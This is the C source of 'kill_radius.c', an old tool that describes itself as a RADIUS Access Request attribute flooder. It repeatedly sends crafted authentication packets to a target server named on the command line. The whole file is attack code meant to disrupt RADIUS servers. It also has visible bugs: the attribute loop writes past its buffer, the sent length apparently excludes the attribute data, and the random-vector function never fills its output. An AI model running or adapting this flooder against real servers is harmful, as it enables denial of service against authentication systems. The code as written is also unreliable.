/*
 * $Id: kill_radius.c,v 1.1.2.3 2001/09/28 17:25:05 3APA3A Exp $
 * RADIUS Access Request attribute flooder
 * (c) 3APA3A http://www.security.nnov.ru
 */


#include "libradius.h"

#include <stdio.h>
#include <stdlib.h>

#include <string.h>
#include <ctype.h>
#include <netdb.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/time.h>
#include <unistd.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <md5.h>
#include <sysexits.h>




void librad_md5_calc(unsigned char *output, unsigned char *input,
		     unsigned int inputlen);

/*
 *	Return an IP address from
 *	one supplied in standard dot notation.
 */
uint32_t ip_addr(const char *ip_str)
{
	struct in_addr	in;

	if (inet_aton(ip_str, &in) == 0)
		return INADDR_NONE;
	return in.s_addr;
}


/*
 *	Return an IP address in from a host
 *	name or address in dot notation.
 */
uint32_t ip_getaddr(const char *host)
{
	struct hostent	*hp;
	uint32_t	 a;

	if ((a = ip_addr(host)) != INADDR_NONE)
		return a;

	if ((hp = gethostbyname(host)) == NULL)
		return (uint32_t) INADDR_NONE;

	/*
	 *	Paranoia from a Bind vulnerability.  An attacker
	 *	can manipulate DNS entries to change the length of the
	 *	address.  If the length isn't 4, something's wrong.
	 */
	if (hp->h_length != sizeof(uint32_t)) {
		return (uint32_t) INADDR_NONE;
	}

	memcpy(&a, hp->h_addr, sizeof(uint32_t));
	return a;
}


/*
 *	Like strncpy, but always adds \0
 */
char *strNcpy(char *dest, const char *src, int n)
{
	if (n > 0)
		strncpy(dest, src, n);
	else
		n = 1;
	dest[n - 1] = 0;

	return dest;
}



/*
 *  The RFC says 4096 octets max, and most packets are less than 256.
 *  However, this number is just larger than the maximum MTU of just
 *  most types of networks, except maybe for gigabit ethernet.
 */

static uint8_t random_vector_pool[AUTH_VECTOR_LEN*2];


/*
 *	Validates the requesting client NAS.  Calculates the
 *	signature based on the clients private key.
 */

#define AUTH_PASS_LEN (16)

/*
 *	Create a random vector of AUTH_VECTOR_LEN bytes.
 */
void random_vector(uint8_t *vector)
{
	int		i;
	static int	did_random = 0;
	static int	counter = 0;

	if (!did_random) {

		for (i = 0; i < (int)sizeof(random_vector_pool); i++) {
			random_vector_pool[i] += random() & 0xff;
		}

		did_random = 1;
	}

	/*
	 *	Modify our random pool, based on the counter,
	 *	and put the resulting information through MD5,
	 *	so it's all mashed together.
	 */
	counter++;
	random_vector_pool[AUTH_VECTOR_LEN] += (counter & 0xff);

	/*
	 *	And do another MD5 hash of the result, to give
	 *	the user a random vector.  This ensures that the
	 *	user has a random vector, without giving them
	 *	an exact image of what's in the random pool.
	 */
}


static int getport(const char *name)
{
	struct	servent		*svp;

	svp = getservbyname (name, "udp");
	if (!svp) {
		return 0;
	}

	return ntohs(svp->s_port);
}



typedef struct radius_packet_t {
  uint8_t       code;
  uint8_t       id;
  uint16_t      length;
  uint8_t       vector[AUTH_VECTOR_LEN];
  uint8_t       data[4076];
} radius_packet_t;
          


char buf[256];


int radius_send(char* radius, int ntimes, int attr)
{
	int port = 0;
	int res=0;
	int sockfd;
	int total_length;
	unsigned dst_ipaddr;
	struct  sockaddr_in     saremote;
	struct  sockaddr_in     *sa;	
	struct timeval  tv;
	fd_set          rdfdesc;
	char vector[AUTH_VECTOR_LEN];
	radius_packet_t packet;
	int	               salen;
	int                     data_len;
	int                     count;
	int 			i;

	memset(&packet, 0, sizeof(packet));


	port = getport("radius");
	if (port == 0) port = PW_AUTH_UDP_PORT;
	if ((sockfd = socket(AF_INET, SOCK_DGRAM, 0)) < 0) {
		return 1;
	}
	packet.code = PW_AUTHENTICATION_REQUEST;
	packet.id=0;
	total_length = 0;
	packet.length = htons(total_length);


	total_length+=(4+AUTH_VECTOR_LEN);
	packet.length = htons(total_length);
	memcpy(vector, packet.vector, AUTH_VECTOR_LEN);
	
	dst_ipaddr = ip_getaddr(radius);

	sa = (struct sockaddr_in *) &saremote;
	memset ((char *) sa, '\0', sizeof (saremote));
	sa->sin_family = AF_INET;
	sa->sin_addr.s_addr = dst_ipaddr;
	sa->sin_port = htons(port);
	
	for (i=20; i<4096;){
	 packet.data[i++]=attr;
	 packet.data[i++]=2;
	}

	for (i=0; i<ntimes; i++){
		random_vector(packet.vector);
		res = sendto(sockfd, &packet, total_length, 0,
		      (struct sockaddr *)&saremote, sizeof(struct sockaddr_in));
		if(res != total_length){
			return 2;
		}
		packet.id++;
	}
	return 0;
}



int main(int argc, char*argv[]){

  int result=0;
  int attr;
  int ntries;
  int i;

  if (argc != 4 || (attr = atoi(argv[2])) == 0 || 
  	(ntries = atoi(argv[3])) == 0) {
  		printf ("Usage : %s server attribute count\n", argv[0]);
  		return 1;
  }
  return radius_send( argv[1], ntries, attr);
}
